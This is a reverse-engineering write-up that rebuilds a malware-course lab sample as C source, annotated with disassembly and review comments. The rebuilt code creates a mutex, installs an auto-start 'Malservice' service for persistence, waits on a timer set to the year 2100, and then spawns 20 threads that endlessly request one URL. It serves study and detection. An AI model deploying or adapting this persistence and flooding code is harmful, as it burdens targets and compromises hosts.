Lab01-02(逆向)
代码逆向之旅2
// Lab01-02_Reverse.cpp : This file contains the "main" function. Program execution begins and ends here.
//
// Source-level reconstruction of the Lab01-02 sample, recovered from its
// disassembly. Each C statement is preceded by the instructions it was
// derived from (".text:ADDR ..." comments), so the listing can be read
// side by side with the disassembler. The strings, names and constants in
// this file are therefore the sample's own artefacts: the mutex "HGL345",
// the service "Malservice", the user-agent "Internet Explorer 8.0" and the
// URL requested in the thread routine are all usable as detection indicators.

#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
#include<Wininet.h>
#pragma comment(lib,"Wininet.lib")

// Thread routine handed to CreateThread below (20 copies are started).
// Opens one WinINet session and then requests the same URL forever; the
// loop has no exit, no delay and never closes the session handle.
// NOTE(review): the disassembly lists an lpThreadParameter argument
// (dword ptr 4) that this reconstruction drops from the signature; the
// caller papers over that with a cast to LPTHREAD_START_ROUTINE.
DWORD WINAPI StartAddress()
{

    // .text : 00401150
    // .text : 00401150 lpThreadParameter = dword ptr 4
    // .text : 00401150
    // .text : 00401150 push esi
    // .text : 00401151 push edi
    // .text : 00401152 push 0; dwFlags
    // .text:00401154 push 0; lpszProxyBypass
    // .text:00401156 push 0; lpszProxy
    // .text:00401158 push 1; dwAccessType
    // .text:0040115A push offset szAgent; "Internet Explorer 8.0"
    // .text:0040115F call ds : InternetOpenA
    // dwAccessType 1 == INTERNET_OPEN_TYPE_DIRECT (no proxy). The returned
    // handle is never checked for NULL, matching the disassembly.
    HINTERNET hInternet = InternetOpenA("Internet Explorer 8.0",1,0,0,0);
    while (TRUE)
    {
        // .text : 00401165 mov edi, ds : InternetOpenUrlA
        // .text : 0040116B mov esi, eax
        // .text : 0040116D
        // .text : 0040116D loc_40116D : ; CODE XREF : StartAddress + 30↓j
        // .text : 0040116D push 0; dwContext
        // .text:0040116F push 80000000h; dwFlags
        // .text:00401174 push 0; dwHeadersLength
        // .text:00401176 push 0; lpszHeaders
        // .text:00401178 push offset szUrl; "http://www.malwareanalysisbook.com"
        // .text:0040117D push esi; hInternet
        // .text:0040117E call edi; InternetOpenUrlA
        // dwFlags 0x80000000 == INTERNET_FLAG_RELOAD: bypass the cache so
        // every iteration is a fresh request to the origin server. The
        // request handle is never closed, so handles leak on every loop.
        InternetOpenUrlA(hInternet, "http://www.malwareanalysisbook.com", 0, 0, 0x80000000, 0);
        // .text:00401180 jmp short loc_40116D
        // .text:00401180 StartAddress endp*/

    }
}

// ServiceMain / worker of the sample. In order: single-instance check via
// the "HGL345" mutex, persistence via an auto-start service pointing at its
// own executable, then an (effectively indefinite) wait on a timer due in
// the year 2100 before spawning the 20 request threads.
// Returns 0 on both exit paths; the threads it creates are never joined.
// NOTE(review): main() invokes this both as a service entry point (via an
// LPSERVICE_MAIN_FUNCTIONA cast) and directly; the disassembly pushes two
// arguments before "call sub_401040", which this no-argument signature
// does not reflect.
int sub_401040()
{

    // .text : 00401040 SystemTime = SYSTEMTIME ptr - 400h
    SYSTEMTIME SystemTime;
    // .text : 00401040 FileTime = _FILETIME ptr - 3F0h
    _FILETIME FileTime;
    // .text : 00401040 Filename = byte ptr - 3E8h
    // BUG(review): the stack frame shows a 0x3E8-byte (1000-byte) buffer
    // here, and GetModuleFileNameA below is told it may write 0x3E8 bytes,
    // but the reconstruction declares a single char. As written this is a
    // stack buffer overflow in the rebuilt source; it should be
    // `char Filename[0x3E8];` (and the two `&Filename` uses become `Filename`).
    char Filename;
    // .text : 00401046 push offset Name; "HGL345"
    // .text:0040104B push 0; bInheritHandle
    // .text:0040104D push 1F0001h; dwDesiredAccess
    // .text:00401052 call ds : OpenMutexA

    // .text : 00401058 test eax, eax
    // .text:0040105A jz short loc_401064
    // 0x1F0001 == MUTEX_ALL_ACCESS. A non-NULL handle means another
    // instance already created the mutex, so this copy exits at once.
    if (OpenMutexA(0x1F0001, 0, "HGL345") != 0)
    {
        // .text : 0040105C push 0; uExitCode
        // .text:0040105E call ds : ExitProcess
        ExitProcess(0);
    }
    // .text : 00401064 loc_401064 : ; CODE XREF : sub_401040 + 1A↑j
    // .text : 00401064 push esi
    // .text : 00401065 push offset Name; "HGL345"
    // .text:0040106A push 0; bInitialOwner
    // .text:0040106C push 0; lpMutexAttributes
    // .text:0040106E call ds : CreateMutexA
    // Claims the single-instance marker. Return value unchecked (as in the
    // disassembly: no test after the call).
    CreateMutexA(0, 0, "HGL345");
    // .text : 00401074 push 3; dwDesiredAccess
    // .text:00401076 push 0; lpDatabaseName
    // .text:00401078 push 0; lpMachineName
    // .text:0040107A call ds : OpenSCManagerA
    // dwDesiredAccess 3 == SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE,
    // i.e. exactly what CreateServiceA below needs. Requires admin rights;
    // a NULL handle is not checked and would make CreateServiceA fail.
    SC_HANDLE hSCManager = OpenSCManagerA(0, 0, 3);
    // .text : 00401080 mov esi, eax
    // .text:00401082 lea eax, [esp + 404h + Filename]
    // .text:00401086 push 3E8h; nSize
    // .text:0040108B push eax; lpFilename
    // .text:0040108C push 0; hModule
    // .text:0040108E call ds : GetModuleFileNameA
    // hModule 0 == the running executable itself: the sample records its own
    // path to register it as the service binary.
    GetModuleFileNameA(0, &Filename, 0x3E8);
    // .text : 00401094 push 0; lpPassword
    // .text:00401096 push 0; lpServiceStartName
    // .text:00401098 push 0; lpDependencies
    // .text:0040109A push 0; lpdwTagId
    // .text:0040109C lea ecx, [esp + 414h + Filename]
    // .text:004010A0 push 0; lpLoadOrderGroup
    // .text:004010A2 push ecx; lpBinaryPathName
    // .text:004010A3 push 0; dwErrorControl
    // .text:004010A5 push 2; dwStartType
    // .text:004010A7 push 10h; dwServiceType
    // .text:004010A9 push 2; dwDesiredAccess
    // .text:004010AB push offset DisplayName; "Malservice"
    // .text:004010B0 push offset DisplayName; "Malservice"
    // .text:004010B5 push esi; hSCManager
    // .text:004010B6 call ds : CreateServiceA
    // Persistence: service and display name "Malservice", dwServiceType 0x10
    // == SERVICE_WIN32_OWN_PROCESS, dwStartType 2 == SERVICE_AUTO_START
    // (runs at boot), lpServiceStartName 0 == LocalSystem. dwDesiredAccess 2
    // == SERVICE_CHANGE_CONFIG. Result unchecked, so on a machine where the
    // service already exists (or SCM access failed) execution just continues.
    // Note the case difference from the "MalService" string used in main().
    CreateServiceA(hSCManager, "Malservice", "Malservice", 2, 0x10, 2, 0, &Filename, 0, 0, 0, 0, 0);
    // .text : 004010BC xor edx, edx
    // .text : 004010BE lea eax, [esp + 404h + FileTime]
    // .text : 004010C2 mov dword ptr[esp + 404h + SystemTime.wYear], edx
    // NOTE(review): each of the four "mov dword ptr" stores writes 4 bytes,
    // i.e. two adjacent WORD fields (wYear+wMonth, wDayOfWeek+wDay,
    // wHour+wMinute, wSecond+wMilliseconds). The reconstruction zeroes only
    // the first field of each pair and leaves wMonth, wDay, wMinute and
    // wMilliseconds uninitialized before SystemTimeToFileTime reads them;
    // zero the whole struct (or set those four fields) to match the binary.
    SystemTime.wYear = 0;
    // .text : 004010C6 lea ecx, [esp + 404h + SystemTime]
    // .text : 004010CA mov dword ptr[esp + 404h + SystemTime.wDayOfWeek], edx
    SystemTime.wDayOfWeek = 0;
    // .text : 004010CE push eax; lpFileTime
    // .text:004010CF mov dword ptr[esp + 408h + SystemTime.wHour], edx
    SystemTime.wHour = 0;
    // .text : 004010D3 push ecx; lpSystemTime
    // .text:004010D4 mov dword ptr[esp + 40Ch + SystemTime.wSecond], edx
    SystemTime.wSecond = 0;
    // .text : 004010D8 mov[esp + 40Ch + SystemTime.wYear], 834h
    // 0x834 == 2100 decimal: the timer below is due in the year 2100, so in
    // practice the wait that follows never returns and the threads are
    // never started unless the clock is moved forward.
    SystemTime.wYear = 0X834;
    // .text : 004010DF call ds : SystemTimeToFileTime
    SystemTimeToFileTime(&SystemTime, &FileTime);
    // .text : 004010E5 push 0; lpTimerName
    // .text:004010E7 push 0; bManualReset
    // .text:004010E9 push 0; lpTimerAttributes
    // .text:004010EB call ds : CreateWaitableTimerA
    // Unnamed, auto-reset timer; handle unchecked.
    HANDLE hTimer = CreateWaitableTimerA(0, 0, 0);
    // .text : 004010F1 push 0; fResume
    // .text:004010F3 push 0; lpArgToCompletionRoutine
    // .text:004010F5 push 0; pfnCompletionRoutine
    // .text:004010F7 lea edx, [esp + 410h + FileTime]
    // .text : 004010FB mov esi, eax
    // .text : 004010FD push 0; lPeriod
    // .text:004010FF push edx; lpDueTime
    // .text:00401100 push esi; hTimer
    // .text:00401101 call ds : SetWaitableTimer
    // A positive due time is absolute, so FILETIME is reinterpreted as the
    // LARGE_INTEGER the API expects (both are 8 bytes). lPeriod 0 == one-shot.
    SetWaitableTimer(hTimer, (const LARGE_INTEGER*)&FileTime, 0, 0, 0, 0);
    // .text : 00401107 push 0FFFFFFFFh; dwMilliseconds
    // .text:00401109 push esi; hHandle
    // .text:0040110A call ds : WaitForSingleObject

    // .text : 00401110 test eax, eax
    // .text : 00401112 jnz short loc_40113F
    // 0xFFFFFFFF == INFINITE. The branch is taken only for WAIT_OBJECT_0 (0);
    // comparing a DWORD against NULL works but reads oddly — `== WAIT_OBJECT_0`
    // is the intended meaning.
    if (WaitForSingleObject(hTimer, 0X0FFFFFFFF) == NULL)
    {
        // .text : 00401114 push edi
        // .text : 00401115 mov edi, ds : CreateThread

        // .text : 0040111B mov esi, 14h
        // 0x14 == 20 threads, each running StartAddress in an endless loop.
        int i = 0x14;
        while (i != 0)
        {

            // .text : 00401120
            // .text : 00401120 loc_401120 : ; CODE XREF : sub_401040 + F2↓j
            // .text : 00401120 push 0; lpThreadId
            // .text:00401122 push 0; dwCreationFlags
            // .text:00401124 push 0; lpParameter
            // .text:00401126 push offset StartAddress; lpStartAddress
            // .text:0040112B push 0; dwStackSize
            // .text:0040112D push 0; lpThreadAttributes
            // .text:0040112F call edi; CreateThread
            // Thread handles are discarded (never closed or waited on).
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&StartAddress, 0, 0, 0);
            // .text:00401131 dec esi
            i--;
            // .text : 00401132 jnz short loc_401120
            // .text : 00401134 pop edi
        }
        // .text : 00401135 xor eax, eax
        // .text : 00401137 pop esi
        // .text : 00401138 add esp, 400h
        // .text:0040113E retn

        return 0;

    }
    // .text : 0040113F loc_40113F : ; CODE XREF : sub_401040 + D2↑j
    // .text : 0040113F xor eax, eax
    // .text : 00401141 pop esi
    // .text : 00401142 add esp, 400h
    // .text : 00401148 retn
    return 0;
}

// Process entry point. Registers sub_401040 as the ServiceMain for
// "MalService" and hands control to the service control dispatcher; when
// the dispatcher returns (presumably because the process was not started by
// the SCM, e.g. on first run), it falls through and calls sub_401040 directly,
// which is the path that creates the service.
// NOTE(review): `void main` is non-standard; the original is presumably
// `int main`. The two stores to var_8/var_4 in the disassembly look like the
// all-NULL terminating entry the dispatcher table requires; this single-
// element reconstruction omits it, so `SERVICE_TABLE_ENTRYA ServiceStartTable[2]`
// with a zeroed second entry would be the faithful form.
void main(int argc, const char** argv, const char** envp)
{
    SERVICE_TABLE_ENTRYA ServiceStartTable = {NULL};

    // .text : 00401003 lea eax, [esp + 10h + ServiceStartTable]
    // .text : 00401007 mov[esp + 10h + ServiceStartTable.lpServiceName], offset aMalservice; "MalService"
    ServiceStartTable.lpServiceName = (LPSTR)"MalService";
    // .text:0040100F push eax; lpServiceStartTable
    // .text:00401010 mov[esp + 14h + ServiceStartTable.lpServiceProc], offset sub_401040
    // The cast hides the signature mismatch: sub_401040 takes no arguments
    // here, while a ServiceMain receives (DWORD argc, LPSTR *argv).
    ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)&sub_401040;
    // .text : 00401018 mov[esp + 14h + var_8], 0
    // .text:00401020 mov[esp + 14h + var_4], 0
    // .text : 00401028 call ds : StartServiceCtrlDispatcherA
    // Return value unchecked, so the direct call below runs regardless of
    // whether the dispatcher succeeded.
    StartServiceCtrlDispatcherA((SERVICE_TABLE_ENTRYA *)&ServiceStartTable);
    // .text : 0040102E push 0
    // .text : 00401030 push 0
    // .text : 00401032 call sub_401040
    sub_401040();
    // .text : 00401037 add esp, 18h

}
